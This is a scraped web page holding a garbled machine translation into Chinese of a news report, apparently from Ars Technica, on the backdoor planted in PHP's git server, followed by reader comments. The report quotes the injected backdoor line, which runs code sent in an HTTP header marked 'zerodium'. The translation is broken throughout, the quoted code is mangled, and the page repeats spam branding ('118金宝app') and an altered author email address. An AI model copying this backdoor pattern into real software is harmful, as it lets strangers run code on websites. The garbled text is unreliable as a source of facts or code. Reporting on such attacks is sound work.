118金宝app

供应链的攻击,

黑客后门PHP源代码后违反内部git服务器

代码给程式执行的权力,谁知道这个秘密密码:“zerodium。”

- - - - - -

一个卡通门导致的计算机代码。
扩大
BeeBright /盖蒂图片社/ iStockphoto

黑客破坏服务器用于分发源代码PHP编程语言和添加了一个后门,会使网站容易完成收购,开源项目的成员说。

两个更新推到PHP Git周末服务器添加一行,如果由一个PHP-powered网站,允许游客没有授权执行代码的选择。恶意犯在这里在这里给的代码的代码注入能力游客“zerodium”这个词在一个HTTP头。

PHP.net砍,代码后门

提交了账户下的php-src回购两个著名的PHP开发人员的名字,拉姆Lerdorf和尼基塔波波夫。“我们还不知道这如何发生,但一切都指向一个妥协的git.php.net服务器(而不是妥协的git账户),“波波夫中写道请注意周日晚间发表。

后的妥协,波波夫说,PHP维护者得出结论,其独立的Git基础设施是一个不必要的安全风险。因此,他们将停止git.php.net服务器,使GitHub的官方来源PHP库。展望未来,所有PHP源代码变化将直接GitHub而不是git.php.net。

恶意的变化引起了公众的关注不迟于周日晚上由开发人员包括马库斯,无助杰克Birchallf,和迈克尔Vořišek审查提交周六了。传说的更新,修复一个错误,是一个帐户下Lerdorf使用的名字。首次发现后不久,Vořišek发现第二个恶意提交,这是在波波夫的帐户名称。它声称恢复以前的错误修复。

扩大

扩大

同时提交添加相同的行代码:

onvert_to_string (enc);如果(strstr (Z_STRVAL_P (enc)、“zerodium”)) {zend_try {zend_eval_string (Z_STRVAL_P (enc) + 8, NULL,“REMOVETHIS:卖给zerodium, 2017年中期”);

Zerodium代理购买利用从研究人员和卖给政府机构在调查或其他用途使用。为什么提交引用Zerodium还不清楚。该公司的首席执行官,Chaouki Bekrar,周一在Twitter上,Zerodium没有涉及。

“干杯的巨魔把“Zerodium”在今天的PHP git提交妥协,”他写道。“很明显,我们与这无关。的研究员(s)可能发现这个bug /利用试图卖给许多实体,但没有一个想买这个垃圾,所以他们烧毁为了好玩。

坏业力

前妥协,PHP组处理所有写访问http://git.php.net/服务器上自己的git存储库使用波波夫所谓“国产”系统称为业力。它提供了开发人员根据先前的贡献不同级别的访问权限。与此同时,GitHub镜像存储库。

现在,PHP集团是git放弃自托管和管理基础设施和GitHub取代它。GitHub的变化意味着现在是“规范”库。PHP团队将不再使用业力系统。相反,贡献者将PHP GitHub上组织的一部分,必须使用双重认证账户的能力提交。

进一步的阅读

如果你安装了PEAR PHP在过去6个月,你可能会被感染
本周末的事件不是第一次php.net服务器已经违反了与供应链执行攻击的意图。2019年初,广泛使用的PHP扩展和应用程序存储库暂时关闭的大多数网站后发现黑客主要的包管理器所取代与恶意。组开发人员说人已经下载的软件包管理器在过去六个月应该会得到一个新副本。

PHP运行估计80%的网站。没有报告的网站将恶意更改合并到他们的生产环境。

变化可能是由那些想炫耀他们的未经授权的访问PHP Git服务器而不是那些试图实际上后门使用PHP的网站,联合创始人兼首席执行官网络高清摩尔称,发现平台轰鸣。

”这话听起来就好像这件攻击者恶意破坏Zerodium或试图给人的印象,代码是后门更长时间,”他告诉Ars。“无论如何,我将花很多时间之前提交,如果我有任何PHP安全利益。”

丹Goodin丹是安全Ars Technica的编辑,2012年他加入注册工作后,美联社,彭博新闻和其他出版物。
电子邮件 dan.goodin@www.calpashop.com / / 推特 @dangoodin001

99年读者评论

  1. claude.bingSmack-Fu大师,在训练 118金宝app
    我认为这将是有益的长期处理拉请求使用GitHub的工作流。也许会让人更容易修复和功能有助于PHP社区而不是通过一些比较传统的方法。

    关于服务器:事情发生,但值得庆幸的是它被抓住了。危机避免!
    29日发布|注册
  2. Spec1alFxSmack-Fu大师,在训练
    $行动- > facepalm指();
    50个帖子|注册
  3. XavinArs Legatus Legionis 118金宝app
    只是一个例子,为什么你不应该尝试使用你自己的安全相关基础设施,除非你真的真的知道你在做什么。
    28490个帖子|注册
  4. twmSmack-Fu大师,在训练
    我可以看到他们为什么这样做,但是我还是担心,所有的源代码最终往往在GitHub上。

    没有我们知道平台单作是坏的?

    (我猜不是)。
    78个帖子|注册
  5. whiteknaveArs Tribunus Militum 118金宝app
    大的力量
    2359个帖子|注册
  6. claude.bingSmack-Fu大师,在训练 118金宝app
    twm写道:
    我可以看到他们为什么这样做,但是我还是担心,所有的源代码最终往往在GitHub上。

    没有我们知道平台单作是坏的?

    (我猜不是)。


    事实上,有其他人共享相同的意见:

    https://lwn.net/Articles/850992/

    有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。
    29日发布|注册
  7. srhArs百夫长 118金宝app
    的一个(一些)我很感激在perl代码在本地磁盘5.8.5 !财富500强的偏执和惯性增值。

    我为创业公司工作直到最近,作为CI工作流的一部分,把库来自包括一些粗略.cz域。这个概念的关键部件从外部来源到您的本地网络似乎因此外国给我。但这似乎是很多软件开发的方式。

    这是可怕的想法多少互联网是建立在这个基础。
    376个帖子|注册
  8. hasibArs百夫长
    twm写道:
    我可以看到他们为什么这样做,但是我还是担心,所有的源代码最终往往在GitHub上。

    没有我们知道平台单作是坏的?

    (我猜不是)。

    Git是Git,为什么这事如果GitHub主机存储库是一种常见的地方吗?它自然之外的文化强加任何Git本身?GitHub-specific特性似乎方便的包装功能存在或可能被复制到其他地方。
    1642个帖子|注册
  9. claude.bingSmack-Fu大师,在训练 118金宝app
    srh写道:
    perl 5.8.5


    17年前被释放。我不确定这是一个足够的理由坚持遗留释放那么长时间。即使你只做离线开发,肯定有重要的bug修复之后?

    编辑:13 - > 17年
    29日发布|注册
  10. 斯特恩Ars Tribunus Militum 118金宝app
    claude.bing写道:
    事实上,有其他人共享相同的意见:

    https://lwn.net/Articles/850992/

    有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。

    有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。
    2359个帖子|注册
  11. CraigJArs长官 118金宝app
    这些承诺都关注的快,立即纠正行动,在一天左右,政策和程序被更新和额外的安全层的实现是值得赞扬的。

    没有完美的100%安全的解决方案,但事实显然是维护者目测这些提交近乎实时的是令人鼓舞的。
    23185个帖子|注册
  12. claude.bingSmack-Fu大师,在训练 118金宝app
    斯特恩写道:
    claude.bing写道:
    事实上,有其他人共享相同的意见:

    https://lwn.net/Articles/850992/

    有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。

    有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。


    不幸的是,人们失去兴趣的项目,或人们失去兴趣这些自由/开源软件项目在处理粗糙的边缘,大预算可以克服。这是一个复杂的问题,在这种情况下,我怀疑GitHub将在不久的将来取代,除非出现重大失误。
    29日发布|注册
  13. dmccartyArs Scholae Palatinae 118金宝app
    引用:
    如果(strstr (Z_STRVAL_P (enc)、“zerodium”)) {

    没有人做任何形式的远程PHP的严重攻击就会这样做。

    最后一次编辑dmccarty于2021年3月29日,星期一下午3:04

    1033个帖子|注册
  14. mdrejhonArs Tribunus Militum 118金宝app
    claude.bing写道:
    斯特恩写道:
    claude.bing写道:
    事实上,有其他人共享相同的意见:

    https://lwn.net/Articles/850992/

    有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。

    有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。


    不幸的是,人们失去兴趣的项目,或人们失去兴趣这些自由/开源软件项目在处理粗糙的边缘,大预算可以克服。这是一个复杂的问题,在这种情况下,我怀疑GitHub将在不久的将来取代,除非出现重大失误。

    这就是为什么我爱fork-repo特性(如github的)。新维护人员加大了这种方式,放弃了项目许可证。

    有时这些成为事实上的主要回购一旦好维护他们的声誉。
    1645个帖子|注册
  15. 他的风筝Ars百夫长 118金宝app
    PHP80%的网站吗?人类注定要失败。
    261个帖子|注册
  16. 罗马Ars Tribunus Militum 118金宝app
    Xavin写道:
    只是一个例子,为什么你不应该尝试使用你自己的安全相关基础设施,除非你真的真的知道你在做什么。


    我不知道原因。有时“滚动自己”是出于必要,因为几乎没有替代品。GitHub很多更新的其他源代码存储库……这当然不像PHP本身一样古老(1994年开始)
    2595个帖子|注册
  17. janhecArs百夫长 118金宝app
    dmccarty写道:
    引用:
    如果(strstr (Z_STRVAL_P (enc)、“zerodium”)) {

    没有人做任何形式的远程PHP的严重攻击就会这样做。

    你肯定打我一个!
    355个帖子|注册
  18. CraigJArs长官 118金宝app
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?

    PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。

    我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……
    23185个帖子|注册
  19. TheFuArs长官
    服务器运行php应用?
    它肯定是一个邪恶的高价值目标类型。
    3301个帖子|注册
  20. 副赶大车的人Ars长官 118金宝app
    TheFu写道:
    服务器运行php应用?
    它肯定是一个邪恶的高价值目标类型。


    Wordpress安装在共享的网络,没有修补了四年。
    5082个帖子|注册
  21. 格雷厄姆·JArs Tribunus Militum 118金宝app
    CraigJ写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?

    PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。

    我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……

    它往往是安全的对于非开发人员使用别人的比自己的代码。困难的是在评估安全运行是什么以及如何保持这种方式。即使对于有经验的开发者可以困难。
    1829个帖子|注册
  22. dio82Ars Tribunus Angusticlavius
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
    7759个帖子|注册
  23. SlowMoeSmack-Fu大师,在训练 118金宝app
    CraigJ写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?

    Python已经“错误不应该通过默默地”作为核心价值。是的,Python会如此的更好的,真的。ASP。网也会更好,当然这是一个痛苦的发展,但我认为这很好时的安全。

    你有一点节点。不过,js。
    12个帖子|注册
  24. libelleSmack-Fu大师,在训练 118金宝app
    这几乎攻击似乎是为了被探测到。显然是零努力投入困惑。我能得到所有阴谋论,但是,也许这只是一个不成熟的供应链的攻击。

    这是一个好事,这是快速检测,无疑会刺激更大的概述未来的承诺。也许会好复习之前提交。
    77个帖子|注册
  25. libelleSmack-Fu大师,在训练 118金宝app
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !
    77个帖子|注册
  26. dio82Ars Tribunus Angusticlavius
    CraigJ写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?

    PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。

    我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……


    在PHP 7之前,PHP是一个可怕的,不安全的hackster严重没有权利存在的语言。但PHP发布后7和清洁的进化和坚实的框架体系结构如Laravel或Symfony, PHP web服务已经成为严重好。
    7759个帖子|注册
  27. papatrollSmack-Fu大师,在训练 118金宝app
    CraigJ写道:
    我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……


    祝你好运。
    64个帖子|注册
  28. andrewb610Ars长官 118金宝app
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !

    要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
    4565个帖子|注册
  29. libelleSmack-Fu大师,在训练 118金宝app
    andrewb610写道:
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !

    要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。


    我做网站用C(别问)。

    但是在所有严重性,Yii一直很强劲,严重的PHP框架十年现在,即使在阴暗的时光的PHP 4. x。
    77个帖子|注册
  30. claude.bingSmack-Fu大师,在训练 118金宝app
    andrewb610写道:
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !

    要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。


    一切皆有可能有足够的时间和精力。会让你忙上一段时间,那是肯定的!
    29日发布|注册
  31. andrewb610Ars长官 118金宝app
    claude.bing写道:
    andrewb610写道:
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !

    要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。


    一切皆有可能有足够的时间和精力。会让你忙上一段时间,那是肯定的!

    我已经重写了一些(尽管他们完全内部网)。重做直接用PHP的HTML,它使得我的生活更加容易。
    4565个帖子|注册
  32. dio82Ars Tribunus Angusticlavius
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !


    耸耸肩……Yii是不兼容的Symfony的依赖注入容器,所以从我被引导。

    Symfony + API平台是一个绝对杀手组合web服务和microservices,我现在的面包和黄油。
    7759个帖子|注册
  33. makimaki聪明,Ars岁老兵
    andrewb610写道:
    libelle写道:
    dio82写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    主要是Wordpress, Joomla和其他消费者的cms。

    高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。


    别忘了Yii !

    要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。



    也总有webassembly,您可以编译从C或生锈(和其他语言)....

    或者直接写自己。
    120个帖子|注册
  34. 他的风筝Ars百夫长 118金宝app
    dio82写道:
    CraigJ写道:
    他的风筝写道:
    PHP80%的网站吗?人类注定要失败。


    因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?

    PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。

    我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……


    在PHP 7之前,PHP是一个可怕的,不安全的hackster严重没有权利存在的语言。但PHP发布后7和清洁的进化和坚实的框架体系结构如Laravel或Symfony, PHP web服务已经成为严重好。


    我想我有点落后于时代。我一直在,但我自己还没有处理PHP,尽管我采访一个所有PHP web游戏公司希望他们所有的行动在PHP脚本完成。我慢慢地后退,密切关注他们的手。
    261个帖子|注册
  35. JedakiahArs Scholae Palatinae
    Xavin写道:
    只是一个例子,为什么你不应该尝试使用你自己的安全相关基础设施,除非你真的真的知道你在做什么。


    我们甚至还不知道什么是该漏洞。它会很有趣,看看同样的漏洞影响其他组织。

    多年来我认为Zerodium是一个经纪人。没有意识到他们是实际的客户机。这很疯狂的某些公司行使权力。有人记得HBGary吗?
    856个帖子|注册
  36. DOOManiacArs Tribunus Militum
    澄清一下,这些改变以往把“生产”或审查时提交了吗?在任何时候,用户风险?看起来只是一个* *未遂后门。
    2828个帖子|注册
  37. HamsterExAstrisArs百夫长 118金宝app
    DOOManiac写道:
    澄清一下,这些改变以往把“生产”或审查时提交了吗?

    提交进入他们的主要/主分支。他们没有打包成一个版本,但他们过去的审查阶段。
    285个帖子|注册
  38. DOOManiacArs Tribunus Militum
    还看历史,它给了我们这个有趣的提交命名:

    引用:
    恢复“恢复”恢复“skip-ci修复错误”“



    老实说我认为整件事是一个PHP的团队捕捉它。
    2828个帖子|注册

你必须置评。

通道Ars Technica